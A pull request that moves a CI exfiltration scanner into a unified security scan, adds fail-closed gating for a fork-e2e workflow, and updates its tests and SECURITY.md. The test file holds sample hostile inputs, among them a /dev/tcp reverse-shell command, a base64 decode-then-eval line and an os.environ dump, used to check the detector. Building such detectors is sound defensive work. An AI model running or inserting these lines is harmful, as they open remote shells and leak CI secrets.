### PR TITLE
ci: reconcile fork-e2e scan into the unified Security Scan

### DIFF
--- a/.github/scripts/security-scan/exfil-scan.py
+++ b/.github/scripts/security-scan/exfil-scan.py
@@ -1,26 +1,29 @@
 #!/usr/bin/env python3
-"""
-Static security scan of a fork PR's unified diff, used as a gate before the
-fork-e2e mirror runs the contributor's code with the test-gateway secret.
+"""Scan a PR's *added* lines for secret-exfiltration and obfuscated-exec shapes.
 
-It reads diff TEXT only -- it never checks out or executes the fork's code --
-so it is safe to run anywhere. It is defense-in-depth + a reviewer aid, NOT a
-guarantee: an attacker can obfuscate past regexes, so maintainer approval
-remains the primary gate. Its job is to (a) hard-fail on high-confidence
-exfiltration shapes in ADDED lines, and (b) surface changes to files that run
-during CI bootstrap so the reviewer looks harder.
+Part of the single contributor Security Scan (.github/workflows/security-scan.yml),
+the companion to secret-scan.py: that one flags secrets a PR *commits*, this one
+flags code a PR adds to *steal* the CI secrets it runs with (the test-gateway
+token, GITHUB_TOKEN). It is the detector the fork-e2e mirror relied on before the
+scan was unified -- the mirror runs contributor code with the gateway secret, so
+an env-secret read piped to the network is the shape that matters there.
+
+It reads diff TEXT only -- it never checks out or executes the PR's code -- so it
+is safe on any event. It is defense-in-depth + a reviewer aid, NOT a guarantee:
+an attacker can obfuscate past regexes, so maintainer review remains the primary
+gate. Its job is to (a) hard-fail on high-confidence exfiltration shapes in ADDED
+lines, and (b) surface changes to files that run during CI bootstrap so the
+reviewer looks harder.
 
 Findings are two tiers:
-  - BLOCKING -> clean=false (mirror is withheld unless a maintainer applies the
-    override label): exfil shapes -- a secret-named credential source AND a
-    network sink added to the same file; a wholesale ``os.environ`` dump; a
-    decode-then-exec; or a raw TCP/reverse-shell sink.
-  - INFO -> does not block: edits to CI-bootstrap-executed files (conftest.py,
+  - BLOCKING -> non-zero exit: exfil shapes -- a secret-named credential source
+    AND a network sink added to the same file; a wholesale ``os.environ`` dump; a
+    decode-then-exec; or a raw TCP / reverse-shell sink.
+  - INFO -> ``::warning`` only: edits to CI-bootstrap-executed files (conftest.py,
     setup.py, pyproject build hooks, anything under .github/, pytest plugins).
 
-Usage:   python3 security_scan.py <unified-diff-file>
-Outputs (when $GITHUB_OUTPUT is set): ``clean=true|false`` and a one-line
-``summary=...``. Always exits 0; callers gate on the ``clean`` output.
+Env in:  DIFF_FILE (path to a ``git diff base...head`` / ``gh pr diff`` unified diff).
+Exit:    non-zero if any BLOCKING finding; 0 otherwise.
 """
 
 from __future__ import annotations
@@ -79,7 +82,7 @@ def _changed_files_and_added(diff: str) -> dict[str, list[str]]:
     """
     Group a unified diff's ADDED lines by destination file.
 
-    :param diff: Full unified-diff text (e.g. from ``gh pr diff --patch``).
+    :param diff: Full unified-diff text (e.g. from ``gh pr diff``).
     :returns: Mapping of file path (e.g. ``"tests/conftest.py"``) to the list of
         added line bodies (without the leading ``+``); diff headers excluded.
     """
@@ -96,74 +99,66 @@ def _changed_files_and_added(diff: str) -> dict[str, list[str]]:
     return by_file
 
 
-def scan_diff(diff: str) -> tuple[list[str], list[str]]:
+def scan_diff(diff: str) -> tuple[list[tuple[str, str]], list[tuple[str, str]]]:
     """
     Classify a unified diff into blocking and info findings.
 
     :param diff: Full unified-diff text.
-    :returns: ``(blocking, info)`` -- two lists of human-readable finding
-        strings. ``blocking`` non-empty means the scan is not clean.
+    :returns: ``(blocking, info)`` -- two lists of ``(path, message)`` tuples.
+        ``blocking`` non-empty means the scan is not clean.
     """
     by_file = _changed_files_and_added(diff)
-    blocking: list[str] = []
-    info: list[str] = []
+    blocking: list[tuple[str, str]] = []
+    info: list[tuple[str, str]] = []
 
     for path, added in by_file.items():
         body = "\n".join(added)
         has_net = bool(_NETWORK.search(body))
         has_secret = bool(_SECRET.search(body))
         if has_net and has_secret:
-            blocking.append(f"exfil-shape (secret source + network sink) in {path}")
+            blocking.append((path, "exfil shape: secret-named source + network sink in one file"))
         for ln in added:
             if _STANDALONE.search(ln) and not (
                 # a lone base64/decode call is INFO; only block decode+exec
                 _DECODE.search(ln) and not _EXEC.search(ln)
             ):
-                blocking.append(f"high-risk call in {path}: {ln.strip()[:80]}")
+                blocking.append((path, f"high-risk call: {ln.strip()[:80]}"))
                 break
             if _DECODE.search(ln) and _EXEC.search(ln):
-                blocking.append(f"decode+exec in {path}: {ln.strip()[:80]}")
+                blocking.append((path, f"decode+exec: {ln.strip()[:80]}"))
                 break
         if _HIGH_RISK.search(path):
-            info.append(f"touches CI-executed file: {path}")
+            info.append((path, "touches a file that runs during CI bootstrap; review closely"))
 
     return blocking, info
 
 
-def main(argv: list[str]) -> int:
+def main() -> int:
     """
-    Scan the diff file at ``argv[1]`` and emit ``clean``/``summary`` outputs.
+    Scan the diff at ``$DIFF_FILE`` and report exfil / obfuscated-exec findings.
 
-    :param argv: Process argv; ``argv[1]`` is the unified-diff file path.
-    :returns: Always 0 (callers gate on the ``clean`` GITHUB_OUTPUT value).
+    :returns: 1 if any blocking finding, else 0.
     """
-    if len(argv) < 2:
-        print("usage: security_scan.py <diff-file>", file=sys.stderr)
-        return 0
-    with open(argv[1], encoding="utf-8", errors="replace") as fh:
+    diff_path = os.environ.get("DIFF_FILE")
+    if not diff_path or not os.path.isfile(diff_path):
+        print(f"::error::diff file {diff_path!r} missing")
+        return 1
+
+    with open(diff_path, encoding="utf-8", errors="replace") as fh:
         diff = fh.read()
     blocking, info = scan_diff(diff)
 
-    for f in blocking:
-        print(f"BLOCKING: {f}")
-    for f in info:
-        print(f"info: {f}")
+    for path, msg in info:
+        print(f"::warning file={path}::{msg}")
+    for path, msg in blocking:
+        print(f"::error file={path}::{msg}")
 
-    clean = not blocking
-    if clean:
-        summary = f"clean ({len(info)} CI-file note(s))" if info else "clean"
-    else:
-        summary = f"{len(blocking)} blocking finding(s): " + "; ".join(blocking)
-    summary = summary.replace("\n", " ")[:140]
-
-    out = os.environ.get("GITHUB_OUTPUT")
-    if out:
-        with open(out, "a", encoding="utf-8") as fh:
-            fh.write(f"clean={'true' if clean else 'false'}\n")
-            fh.write(f"summary={summary}\n")
-    print(f"clean={clean} :: {summary}")
+    if blocking:
+        print(f"::error::Exfil scan found {len(blocking)} blocking finding(s) in added lines.")
+        return 1
+    print(f"Exfil scan passed ({len(info)} CI-file note(s)).")
     return 0
 
 
 if __name__ == "__main__":
-    sys.exit(main(sys.argv))
+    sys.exit(main())

--- a/.github/scripts/security-scan/should-scan.sh
+++ b/.github/scripts/security-scan/should-scan.sh
@@ -81,9 +81,12 @@ skip_label_effective() {
 # Only PRs carry untrusted contributor code through the gate. Every other
 # trigger -- push to main / fork-e2e/** (the mirror branch only exists after a
 # returning-contributor / maintainer-approval gate), schedule, dispatch -- is a
-# trusted context, so proceed without scanning.
+# trusted context, so proceed without scanning. pull_request_review is included
+# because the fork-e2e mirror fires on a maintainer's approval, and that path
+# must still consult the head SHA's Security Scan (the review payload carries
+# the same pull_request + author_association fields).
 case "${EVENT_NAME:-}" in
-  pull_request | pull_request_target) ;;
+  pull_request | pull_request_target | pull_request_review) ;;
   *)
     emit false "non-PR event (${EVENT_NAME:-unknown}); trusted context"
     exit 0

--- a/.github/workflows/fork-e2e-mirror.yml
+++ b/.github/workflows/fork-e2e-mirror.yml
@@ -4,7 +4,8 @@ name: Fork e2e mirror
 # fork-e2e/pr-N branch so e2e runs there as a `push` (with secrets). It's a pure
 # git-ref update via a GitHub App token (refs pushed by the default GITHUB_TOKEN
 # don't trigger workflows); it never checks out or runs fork code. Gated by
-# should-mirror.sh + the Fork Security Scan. pull_request_review is included so a
+# should-mirror.sh + the single contributor Security Scan, consulted through the
+# reusable security-gate.yml (fail_closed). pull_request_review is included so a
 # maintainer's approval mirrors immediately, not only on the PR's next push.
 #
 # leak-scan-allow: pull_request_target
@@ -22,14 +23,53 @@ concurrency:
   cancel-in-progress: false
 
 jobs:
+  # Delete the trusted mirror branch when the PR closes. Ungated -- cleanup must
+  # always run so a closed PR never leaves a stale fork-e2e/pr-N branch behind.
+  cleanup:
+    name: cleanup
+    if: ${{ github.event.action == 'closed' && github.event.pull_request.head.repo.fork }}
+    permissions:
+      contents: read
+    runs-on: ubuntu-latest
+    timeout-minutes: 5
+    env:
+      REPO: ${{ github.repository }}
+      MIRROR_BRANCH: fork-e2e/pr-${{ github.event.pull_request.number }}
+    steps:
+      - name: Mint mirror App token
+        id: app-token
+        # App token, not GITHUB_TOKEN: its pushes DO trigger the downstream e2e.
+        uses: actions/create-github-app-token@bcd2ba49218906704ab6c1aa796996da409d3eb1  # v3.2.0
+        with:
+          app-id: ${{ vars.FORK_E2E_APP_ID }}
+          private-key: ${{ secrets.FORK_E2E_APP_PRIVATE_KEY }}
+
+      - name: Delete mirror branch
+        env:
+          GH_TOKEN: ${{ steps.app-token.outputs.token }}
+        run: |
+          gh api -X DELETE "repos/$REPO/git/refs/heads/$MIRROR_BRANCH" >/dev/null 2>&1 \
+            && echo "Deleted $MIRROR_BRANCH" || echo "No $MIRROR_BRANCH to delete"
+
+  # The single contributor Security Scan, consulted as a BLOCKING gate before we
+  # mirror fork code onto a trusted branch where e2e runs WITH the gateway secret.
+  # The scan itself runs once on the PR (security-scan.yml); this poller mirrors
+  # its result. fail_closed: a slow/missing scan blocks the mirror, never opens it.
+  gate:
+    name: security gate
+    if: ${{ github.event.action != 'closed' && github.event.pull_request.head.repo.fork }}
+    uses: ./.github/workflows/security-gate.yml
+    with:
+      fail_closed: true
+
   mirror:
     name: mirror
+    needs: gate
     # Fork PRs only -- same-repo PRs run e2e directly via `pull_request`.
-    if: ${{ github.event.pull_request.head.repo.fork }}
+    if: ${{ github.event.action != 'closed' && github.event.pull_request.head.repo.fork }}
     permissions:
       contents: read
       pull-requests: read
-      statuses: write
     runs-on: ubuntu-latest
     timeout-minutes: 5
     env:
@@ -55,68 +95,18 @@ jobs:
           app-id: ${{ vars.FORK_E2E_APP_ID }}
           private-key: ${{ secrets.FORK_E2E_APP_PRIVATE_KEY }}
 
-      - name: Delete mirror branch on PR close
-        if: ${{ github.event.action == 'closed' }}
-        env:
-          GH_TOKEN: ${{ steps.app-token.outputs.token }}
-        run: |
-          gh api -X DELETE "repos/$REPO/git/refs/heads/$MIRROR_BRANCH" >/dev/null 2>&1 \
-            && echo "Deleted $MIRROR_BRANCH" || echo "No $MIRROR_BRANCH to delete"
-
       - name: Load maintainers
         id: maintainers
-        if: ${{ github.event.action != 'closed' }}
         run: bash .github/scripts/merge-ready/load-maintainers.sh
 
       - name: Evaluate mirror gate
         id: gate
-        if: ${{ github.event.action != 'closed' }}
         env:
           MAINTAINERS: ${{ steps.maintainers.outputs.list }}
         run: bash .github/scripts/fork-e2e/should-mirror.sh
 
-      - name: Security scan of PR diff
-        id: scan
-        # Diff TEXT only -- never checks out or runs fork code.
-        if: ${{ github.event.action != 'closed' }}
-        run: |
-          gh pr diff "$PR" --repo "$REPO" --patch > "$RUNNER_TEMP/pr.diff"
-          python3 .github/scripts/fork-e2e/security_scan.py "$RUNNER_TEMP/pr.diff"
-
-      - name: Check security-scan override label
-        id: override
-        if: ${{ github.event.action != 'closed' }}
-        run: |
-          if gh pr view "$PR" --repo "$REPO" --json labels --jq '.labels[].name' \
-               | grep -qx 'security-scan-override'; then
-            echo "override=true" >> "$GITHUB_OUTPUT"
-          else
-            echo "override=false" >> "$GITHUB_OUTPUT"
-          fi
-
-      - name: Post Fork Security Scan status
-        if: ${{ github.event.action != 'closed' }}
-        env:
-          CLEAN: ${{ steps.scan.outputs.clean }}
-          OVERRIDE: ${{ steps.override.outputs.override }}
-          SUMMARY: ${{ steps.scan.outputs.summary }}  # fork text via env, not interpolated
-        run: |
-          if [[ "$CLEAN" == "true" ]]; then
-            STATE=success; DESC="$SUMMARY"
-          elif [[ "$OVERRIDE" == "true" ]]; then
-            STATE=success; DESC="overridden by maintainer: $SUMMARY"
-          else
-            STATE=failure; DESC="$SUMMARY"
-          fi
-          gh api "repos/$REPO/statuses/$HEAD_SHA" \
-            -f state="$STATE" -f context="Fork Security Scan" \
-            -f description="${DESC:0:140}" >/dev/null
-
       - name: Mirror head SHA onto trusted branch
-        if: >-
-          github.event.action != 'closed'
-          && steps.gate.outputs.mirror == 'true'
-          && (steps.scan.outputs.clean == 'true' || steps.override.outputs.override == 'true')
+        if: ${{ steps.gate.outputs.mirror == 'true' }}
         env:
           GH_TOKEN: ${{ steps.app-token.outputs.token }}
         run: |

--- a/.github/workflows/security-gate.yml
+++ b/.github/workflows/security-gate.yml
@@ -15,6 +15,17 @@ name: Security Gate
 
 on:
   workflow_call:
+    inputs:
+      fail_closed:
+        description: >-
+          When the Security Scan check does not conclude in time, fail the gate
+          (block the caller) instead of proceeding fail-open. Default false
+          (CI workflows fail-open -- a fork `pull_request` run has no secrets);
+          the fork-e2e mirror sets this true because it runs PR code WITH the
+          gateway secret.
+        type: boolean
+        required: false
+        default: false
 
 permissions:
   contents: read
@@ -54,6 +65,7 @@ jobs:
           GH_TOKEN: ${{ github.token }}
           REPO: ${{ github.repository }}
           HEAD_SHA: ${{ github.event.pull_request.head.sha }}
+          FAIL_CLOSED: ${{ inputs.fail_closed }}
         run: |
           echo "Untrusted PR -- waiting for the single 'Security Scan' check on $HEAD_SHA"
           q='[.check_runs[] | select(.name=="Security Scan")] | sort_by(.started_at) | last'
@@ -70,6 +82,10 @@ jobs:
             sleep 5
           done
           if [ -z "$conclusion" ]; then
+            if [ "$FAIL_CLOSED" = "true" ]; then
+              echo "::error::Security Scan check did not complete in time; failing closed (caller runs PR code with secrets)."
+              exit 1
+            fi
             echo "::warning::Security Scan check did not complete in time; proceeding (fail-open)."
             exit 0
           fi

--- a/.github/workflows/security-scan.yml
+++ b/.github/workflows/security-scan.yml
@@ -97,6 +97,12 @@ jobs:
           DIFF_FILE: ${{ github.workspace }}/pr.diff
         run: python3 .github/scripts/security-scan/secret-scan.py
 
+      - name: Exfil scan (added lines)
+        if: ${{ steps.gate.outputs.scan == 'true' }}
+        env:
+          DIFF_FILE: ${{ github.workspace }}/pr.diff
+        run: python3 .github/scripts/security-scan/exfil-scan.py
+
       - name: Sensitive-path guard
         if: ${{ steps.gate.outputs.scan == 'true' }}
         env:

--- a/SECURITY.md
+++ b/SECURITY.md
@@ -33,11 +33,14 @@ By trust tier (GitHub `author_association`):
   maintainer clicks **Approve and run**; after approval the gate's scan still
   applies.
 
-The scan inspects the PR diff for committed secrets, changes to privileged repo
-config (CI workflows, `.github/MAINTAINER`, `CODEOWNERS`, `.github/scripts`),
-CI-workflow misuse (`pull_request_target` + PR-head checkout, unpinned actions),
-and known code-execution / obfuscation patterns (semgrep, local ruleset). It
-only *statically* analyses the diff and runs with **no secrets** on fork PRs,
+The scan inspects the PR diff for committed secrets, secret-exfiltration shapes
+(a secret-named credential source plus a network sink in one file, an
+`os.environ` dump, a decode-then-exec, or a reverse shell), changes to
+privileged repo config (CI workflows, `.github/MAINTAINER`, `CODEOWNERS`,
+`.github/scripts`), CI-workflow misuse (`pull_request_target` + PR-head
+checkout, unpinned actions), and known code-execution / obfuscation patterns
+(semgrep, local ruleset). It only *statically* analyses the diff and runs with
+**no secrets** on fork PRs,
 and the scanner itself always runs from `main`, so a PR cannot weaken its own
 scan.
 

--- a/tests/scripts/test_exfil_scan.py
+++ b/tests/scripts/test_exfil_scan.py
@@ -6,38 +6,29 @@ import sys
 from pathlib import Path
 
 REPO_ROOT = Path(__file__).resolve().parents[2]
-SCRIPT = REPO_ROOT / ".github/scripts/fork-e2e/security_scan.py"
+SCRIPT = REPO_ROOT / ".github/scripts/security-scan/exfil-scan.py"
 
 
-def _run(tmp_path: Path, diff: str) -> dict[str, str]:
+def _run(tmp_path: Path, diff: str) -> subprocess.CompletedProcess[str]:
     """
-    Run security_scan.py over a unified-diff string and return its outputs.
+    Run exfil-scan.py over a unified-diff string and return the finished process.
 
-    :param tmp_path: Pytest tmp dir for the diff + GITHUB_OUTPUT files.
-    :param diff: Unified-diff text (as ``gh pr diff --patch`` would emit).
-    :returns: Parsed ``key=value`` GITHUB_OUTPUT lines, e.g.
-        ``{"clean": "true", "summary": "clean"}``.
+    :param tmp_path: Pytest tmp dir for the diff file.
+    :param diff: Unified-diff text (as ``gh pr diff`` would emit).
+    :returns: The completed process; ``returncode`` is non-zero iff blocking,
+        and ``stdout`` carries the ``::error``/``::warning`` annotations.
     """
     diff_file = tmp_path / "pr.diff"
     diff_file.write_text(diff)
-    out_file = tmp_path / "gh_output"
-    out_file.touch()
     env = os.environ.copy()
-    env["GITHUB_OUTPUT"] = str(out_file)
-    proc = subprocess.run(
-        [sys.executable, str(SCRIPT), str(diff_file)],
+    env["DIFF_FILE"] = str(diff_file)
+    return subprocess.run(
+        [sys.executable, str(SCRIPT)],
         env=env,
         capture_output=True,
         text=True,
         timeout=30,
     )
-    assert proc.returncode == 0, f"script failed: {proc.stderr}"
-    outputs: dict[str, str] = {}
-    for line in out_file.read_text().splitlines():
-        if "=" in line:
-            key, _, value = line.partition("=")
-            outputs[key] = value
-    return outputs
 
 
 def _diff(path: str, added: list[str]) -> str:
@@ -63,20 +54,21 @@ def _diff(path: str, added: list[str]) -> str:
 def test_benign_diff_is_clean(tmp_path: Path) -> None:
     """A normal test addition (no exfil, no CI-bootstrap file) scans clean.
 
-    Guards against the gate blocking ordinary contributions. Asserts
-    ``clean=true`` for an unremarkable new test file.
+    Guards against the scan blocking ordinary contributions. Asserts exit 0 and
+    no error annotation for an unremarkable new test file.
     """
-    out = _run(tmp_path, _diff("tests/test_math.py", ["def test_add():", "    assert 1 + 1 == 2"]))
-    assert out["clean"] == "true"
+    proc = _run(tmp_path, _diff("tests/test_math.py", ["def test_add():", "    assert 1 + 1 == 2"]))
+    assert proc.returncode == 0, proc.stdout
+    assert "::error" not in proc.stdout
 
 
 def test_secret_source_plus_network_blocks(tmp_path: Path) -> None:
     """Reading a secret-named cred AND a network sink in one file blocks.
 
-    The canonical exfil shape. Asserts ``clean=false`` and that the summary
-    names the file.
+    The canonical exfil shape. Asserts exit 1 and an error annotation naming the
+    offending file.
     """
-    out = _run(
+    proc = _run(
         tmp_path,
         _diff(
             "tests/e2e/conftest.py",
@@ -86,49 +78,47 @@ def test_secret_source_plus_network_blocks(tmp_path: Path) -> None:
             ],
         ),
     )
-    assert out["clean"] == "false"
-    assert "conftest.py" in out["summary"]
+    assert proc.returncode == 1
+    assert "::error file=tests/e2e/conftest.py" in proc.stdout
 
 
 def test_decode_then_exec_blocks(tmp_path: Path) -> None:
     """A decode-then-exec payload blocks even without a network sink.
 
-    ``eval(base64.b64decode(...))`` is almost never legitimate. Asserts
-    ``clean=false``.
+    ``eval(base64.b64decode(...))`` is almost never legitimate. Asserts exit 1.
     """
-    out = _run(
+    proc = _run(
         tmp_path,
         _diff("setup.py", ["import base64", "eval(base64.b64decode('cHduZWQ='))"]),
     )
-    assert out["clean"] == "false"
+    assert proc.returncode == 1
 
 
 def test_environ_dump_blocks(tmp_path: Path) -> None:
     """Serializing the whole environment blocks (wholesale-secret exfil).
 
-    ``json.dumps(os.environ)`` is a classic dump-everything sink. Asserts
-    ``clean=false``.
+    ``json.dumps(os.environ)`` is a classic dump-everything sink. Asserts exit 1.
     """
-    out = _run(
+    proc = _run(
         tmp_path,
         _diff(
             "tests/conftest.py",
             ["import json, os", "open('/tmp/x','w').write(json.dumps(os.environ))"],
         ),
     )
-    assert out["clean"] == "false"
+    assert proc.returncode == 1
 
 
 def test_reverse_shell_blocks(tmp_path: Path) -> None:
-    """A /dev/tcp reverse-shell shape blocks. Asserts ``clean=false``."""
-    out = _run(
+    """A /dev/tcp reverse-shell shape blocks. Asserts exit 1."""
+    proc = _run(
         tmp_path,
         _diff(
             "tests/conftest.py",
             ["import os", "os.system('bash -i >& /dev/tcp/1.2.3.4/9001 0>&1')"],
         ),
     )
-    assert out["clean"] == "false"
+    assert proc.returncode == 1
 
 
 def test_normal_gateway_test_not_blocked(tmp_path: Path) -> None:
@@ -136,9 +126,9 @@ def test_normal_gateway_test_not_blocked(tmp_path: Path) -> None:
 
     Low-false-positive guard: the LLM key is not a secret-NAMED source, so an
     ordinary gateway test that reads it and makes a request scans clean. Asserts
-    ``clean=true``.
+    exit 0.
     """
-    out = _run(
+    proc = _run(
         tmp_path,
         _diff(
             "tests/e2e/test_gateway.py",
@@ -149,44 +139,43 @@ def test_normal_gateway_test_not_blocked(tmp_path: Path) -> None:
             ],
         ),
     )
-    assert out["clean"] == "true"
+    assert proc.returncode == 0, proc.stdout
 
 
 def test_ci_file_touch_is_info_not_blocking(tmp_path: Path) -> None:
     """A benign edit to a CI-executed file is INFO (clean), not blocking.
 
     Editing conftest.py / .github without an exfil pattern should surface a
-    note for the reviewer but not withhold the mirror. Asserts ``clean=true``
-    and that the summary records a CI-file note.
+    warning for the reviewer but not block. Asserts exit 0 with a warning.
     """
-    out = _run(tmp_path, _diff("tests/conftest.py", ["# add a harmless fixture comment"]))
-    assert out["clean"] == "true"
-    assert "note" in out["summary"]
+    proc = _run(tmp_path, _diff("tests/conftest.py", ["# add a harmless fixture comment"]))
+    assert proc.returncode == 0, proc.stdout
+    assert "::warning file=tests/conftest.py" in proc.stdout
 
 
 def test_passing_environ_around_not_blocked(tmp_path: Path) -> None:
     """Passing os.environ to a helper (no dump) does NOT block.
 
-    Regression for review feedback: a bare ``os.environ)`` matched benign
-    ``helper(os.environ)`` and withheld the mirror. Only a wholesale dump
-    (``json.dumps(os.environ)`` etc.) should block. Asserts ``clean=true``.
+    Regression: a bare ``os.environ)`` matched benign ``helper(os.environ)`` and
+    blocked. Only a wholesale dump (``json.dumps(os.environ)`` etc.) should
+    block. Asserts exit 0.
     """
-    out = _run(tmp_path, _diff("tests/conftest.py", ["import os", "configure_app(os.environ)"]))
-    assert out["clean"] == "true"
+    proc = _run(tmp_path, _diff("tests/conftest.py", ["import os", "configure_app(os.environ)"]))
+    assert proc.returncode == 0, proc.stdout
 
 
 def test_generic_access_token_field_not_blocked(tmp_path: Path) -> None:
     """A generic ``access_token`` field + a network call does NOT block.
 
-    Regression for review feedback: a case-insensitive ``ACCESS_TOKEN`` term
-    matched ordinary OAuth/JSON ``access_token`` identifiers and, combined with
-    any network use, withheld the mirror. Asserts ``clean=true``.
+    Regression: a case-insensitive ``ACCESS_TOKEN`` term matched ordinary
+    OAuth/JSON ``access_token`` identifiers and, combined with any network use,
+    blocked. Asserts exit 0.
     """
-    out = _run(
+    proc = _run(
         tmp_path,
         _diff(
             "tests/test_oauth.py",
             ["access_token = resp.json()['access_token']", "requests.get(url, headers=h)"],
         ),
     )
-    assert out["clean"] == "true"
+    assert proc.returncode == 0, proc.stdout


### PR DESCRIPTION
## Summary

Now that the single contributor `Security Scan` is blocking, the fork-e2e mirror no longer needs its own inline diff scan. Rather than just delete it, this **ports** the one detector the unified scan was missing and has the mirror consult the single blocking check instead of re-implementing a scan.

- The unified scan had no "secret-named env source + network sink" exfil detector for plain `.py` files (semgrep only caught decode-exec / curl|bash). That detector is the one most specific to the mirror's threat model (steal the gateway token), so `fork-e2e/security_scan.py` is **moved** to `.github/scripts/security-scan/exfil-scan.py`, adapted to the unified contract (reads `$DIFF_FILE`, emits `::error` annotations, exits non-zero on a blocking finding) and run as a step in `security-scan.yml`. Its exfil-shape / `os.environ`-dump / decode-exec / reverse-shell heuristics and their false-positive guards are preserved.
- `should-scan.sh` now treats `pull_request_review` as a scannable event, so the mirror's approval-triggered path still consults the head SHA's `Security Scan` (previously that path would have skipped the gate).
- `security-gate.yml` gains an optional `fail_closed` input (default `false`, preserving today's CI fail-open). The mirror passes `true` so a slow or missing scan **blocks** the secret-bearing mirror rather than failing open.
- `fork-e2e-mirror.yml` is rewired: an ungated `cleanup` job (delete the mirror branch on close) is split from a `gate` job (`uses: ./.github/workflows/security-gate.yml` with `fail_closed: true`) plus a `mirror` job that `needs: gate`. The inline scan, the `security-scan-override` label, and the `Fork Security Scan` status are dropped; the maintainer waiver is now the unified `skip-security-scan`.
- The test is renamed to `tests/scripts/test_exfil_scan.py` and adapted to the new exit-code/annotation contract. `SECURITY.md` documents the exfil detector.

Note: this supersedes the standalone-fork-gate direction in #239 (the two edit the same files in opposite directions); #239 can be closed or reworked once this lands.

## Type of change

- [ ] Bug fix
- [ ] Feature
- [x] Refactor / chore
- [ ] Docs
- [x] Test / CI
- [ ] Breaking change

## Test coverage

- [x] Unit tests added / updated
- [ ] Integration tests added / updated
- [ ] E2E tests added / updated
- [x] Manual verification completed
- [ ] Existing tests cover this change
- [ ] Not applicable

## Coverage rationale

Ran `python -m pytest tests/scripts/test_exfil_scan.py` (9/9 pass): the ported detector keeps every prior case, including the false-positive guards (LLM_API_KEY + network, `helper(os.environ)`, generic `access_token`). Validated all three workflow YAMLs parse, and confirmed the `gate`/`needs: gate` wiring matches the known-good pattern already used by `e2e.yml`. Grepped the repo for dangling references to the removed script, `Fork Security Scan` status, and `security-scan-override` label (none remain).